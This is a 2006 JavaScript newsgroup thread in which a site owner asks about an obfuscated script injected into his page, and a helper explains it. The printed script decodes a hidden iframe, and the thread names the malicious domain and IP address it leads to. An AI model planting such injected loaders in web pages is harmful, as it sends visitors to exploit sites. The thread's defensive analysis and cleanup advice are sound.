Strange appearing javascript - hacked

Hi

I just want to drop a note to say that I managed to find out what the
code does. It uses ROT-4 encoding to redirect you to another URL.
Wong Yung wrote:

Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&

${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>

rsri&B';o='';for(i=0;i<92;i++){o+=String.from

CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!

Wong Yung said the following on 10/22/2006 11:04 PM:

Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&

${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>

rsri&B';o='';for(i=0;i<92;i++){o+=String.from

CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!

It writes out an IFrame tag with it's src attribute set to <URL:
http://e7da7.in/out.php?s_id=1which then redirects to <URL:
http://66.36.241.243/expd/index.phpwhich then wants to run two ActiveX
controls to attempt to display some graphics. Too bad none of it works....

If you didn't insert that code, remove it from your page, reupload, then
see if it shows up again. If it does, find out why your hosting company
is inserting it.

--
Randy
Chance Favors The Prepared Mind
comp.lang.javascript FAQ - http://jibbering.com/faq & newsgroup weekly
Javascript Best Practices - http://www.JavascriptToolbox.com/bestpractices/

Wong Yung said the following on 10/23/2006 12:55 AM:

Hi

I just want to drop a note to say that I managed to find out what the
code does. It uses ROT-4 encoding to redirect you to another URL.

And then it does more, see my other post.

--
Randy
Chance Favors The Prepared Mind
comp.lang.javascript FAQ - http://jibbering.com/faq & newsgroup weekly
Javascript Best Practices - http://www.JavascriptToolbox.com/bestpractices/

Randy Webb wrote:

Wong Yung said the following on 10/22/2006 11:04 PM:

Hi guys,

I recently noticed this strange script appearing on my webpage. I know
I didn't put it there because I hand-coded it. Someone told me it
looks like javascript and it looked like I might have been hacked.
I've taken the webpage down for now but I was hoping someone here would
be able to tell me what it does so I know just how much trouble I'm in.
I'm taking off the script tags and breaking it up just to make sure it
doesn't accidentally run on anyone's computer. However initially it
was all one line.

s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&

${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>

rsri&B';o='';for(i=0;i<92;i++){o+=String.from

CharCode(s.charCodeAt(i)-4);}document.write(o);

Thanks!

It writes out an IFrame tag with it's src attribute set to <URL:
http://e7da7.in/out.php?s_id=1which then redirects to <URL:
http://66.36.241.243/expd/index.phpwhich then wants to run two ActiveX
controls to attempt to display some graphics. Too bad none of it works....

If you didn't insert that code, remove it from your page, reupload, then
see if it shows up again. If it does, find out why your hosting company
is inserting it.

--
Randy
Chance Favors The Prepared Mind
comp.lang.javascript FAQ - http://jibbering.com/faq & newsgroup weekly
Javascript Best Practices - http://www.JavascriptToolbox.com/bestpractices/

Thanks for the info!